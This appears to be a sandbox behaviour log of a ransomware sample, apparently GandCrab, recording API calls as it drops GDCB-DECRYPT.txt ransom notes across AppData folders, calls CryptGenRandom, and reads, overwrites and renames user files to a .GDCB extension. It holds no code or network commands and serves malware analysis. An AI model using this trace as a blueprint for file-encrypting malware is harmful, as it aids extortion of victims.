File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.People_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsFeedback_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsPhone_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.WindowsStore_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Windows.ContactSupport_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows.devicesflow_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Windows.MiracastView_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Windows.PrintDialog_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\windows_ie_ac_001\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\8wekyb3d8bbwe\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-369M1WtPTX1gbG.flv, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\-369M1WtPTX1gbG.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2VKr21JCYqf.m4a, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\2VKr21JCYqf.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\7Myiu18iTn_ngVPG0Kx.flv, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\7Myiu18iTn_ngVPG0Kx.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\7_RurxYXMq2BTCtqr.mp3, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\7_RurxYXMq2BTCtqr.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\9NNryomG21wNwN.png, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\9NNryomG21wNwN.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\AdobeARM.log, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\AdobeARM.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\AdobeARM.log, size = 1048576, size_out = 700 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\AdobeARM.log, size = 704 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\AdobeARM.log, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\AdobeARM.log, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\AdobeARM.log, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\AdobeARM.log.GDCB False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ArmUI.ini, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ArmUI.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ArmUI.ini, size = 1048576, size_out = 257412 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ArmUI.ini, size = 257424 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ArmUI.ini, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ArmUI.ini, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ArmUI.ini, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\ArmUI.ini.GDCB True 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fY0zS5d.rtf, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fY0zS5d.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fY0zS5d.rtf, size = 1048576, size_out = 34108 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fY0zS5d.rtf, size = 34112 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fY0zS5d.rtf, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fY0zS5d.rtf, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fY0zS5d.rtf, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\fY0zS5d.rtf.GDCB False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\GyoubGx88PJkao Y.mp3, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\GyoubGx88PJkao Y.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\hVvFtKteq1q.mp3, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
